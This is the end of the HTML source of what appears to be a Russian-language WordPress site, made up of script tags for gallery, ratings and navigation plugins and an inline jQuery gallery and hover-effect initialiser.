<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/imagesloaded.min.js?ver=3.2.0'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/masonry.min.js?ver=3.3.2'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/js/masonry-init-v3.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/jquery.mousewheel.min.js?ver=1.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/lightgallery.min.js?ver=1.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/jquery.justifiedGallery.min.js?ver=1.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ratingsL10n = {"plugin_url":"http:\/\/abitura30.ru\/plgdir\/wp-postratings","ajax_url":"http:\/\/abitura30.ru\/wp-admin\/admin-ajax.php","text_wait":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043d\u0435 \u0433\u043e\u043b\u043e\u0441\u0443\u0439\u0442\u0435 \u0437\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e.","image":"stars","image_ext":"gif","max":"5","show_loading":"1","show_fading":"1","custom":"0"};
var ratings_mouseover_image=new Image();ratings_mouseover_image.src=ratingsL10n.plugin_url+"/images/"+ratingsL10n.image+"/rating_over."+ratingsL10n.image_ext;;
/* ]]> */
</script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/wp-postratings/postratings-js.js?ver=1.83'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/navigation.js?ver=20120206'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/skip-link-focus-fix.js?ver=20130115'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/superfish.js?ver=20141010'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/superfish-settings.js?ver=20141010'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/comment-reply.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/wp-embed.min.js?ver=4.6.1'></script>
<script type="text/javascript">(function($){var $gallery=$('.dgwt-jg-gallery'),$item=$('.dgwt-jg-item');if($gallery.length>0&&$item.length>0){$gallery.lightGallery({thumbnail:!1,download:!1});$item.children('img').each(function(){if(typeof $(this).attr('srcset')!=='undefined'){$(this).attr('data-jg-srcset',$(this).attr('srcset'));$(this).removeAttr('srcset')}});$gallery.justifiedGallery({lastRow:'nojustify',captions:!1,margins:3,rowHeight:160,maxRowHeight:-1,thumbnailPath:function(currentPath,width,height,$image){if(typeof $image.data('jg-srcset')==='undefined'){return currentPath}var srcset=$image.data('jg-srcset');if($image.length>0&&srcset.length>0){var path,sizes=[],sizesTemp=[],urls=srcset.split(",");if(urls.length>0){for(i=0;i<urls.length;i++){var url,sizeW,item=urls[i].trim().split(" ");if(typeof item[0]!='undefined'&&typeof item[1]!='undefined'){var sizeW=item[1].replace('w','');sizesTemp[sizeW]={width:item[1].replace('w',''),url:item[0]}}}for(i=0;i<sizesTemp.length;i++){if(sizesTemp[i]){sizes.push(sizesTemp[i])}}}for(i=0;i<sizes.length;i++){if(sizes[i].width>=width){return sizes[i].url}}return currentPath}else{return currentPath}}}).on('jg.complete',function(e){$item.each(function(){$(this).on('mouseenter mouseleave',function(e){var $this=$(this),width=$this.width(),height=$this.height();var x=(e.pageX-$this.offset().left-(width/2))*(width>height?(height/width):1),y=(e.pageY-$this.offset().top-(height/2))*(height>width?(width/height):1);var dir_num=Math.round((((Math.atan2(y,x)*(180/Math.PI))+180)/90)+3)%4,directions=['top','right','bottom','left'];if(e.type==='mouseenter'){$this.removeClass(function(index,css){return(css.match(/(^|\s)hover-out-\S+/g)||[]).join(' ')});$this.addClass('hover-in-'+directions[dir_num])}if(e.type==='mouseleave'){$this.removeClass(function(index,css){return(css.match(/(^|\s)hover-in-\S+/g)||[]).join(' ')});$this.addClass('hover-out-'+directions[dir_num])}})})})}}(jQuery))</script>
</body>
</html>

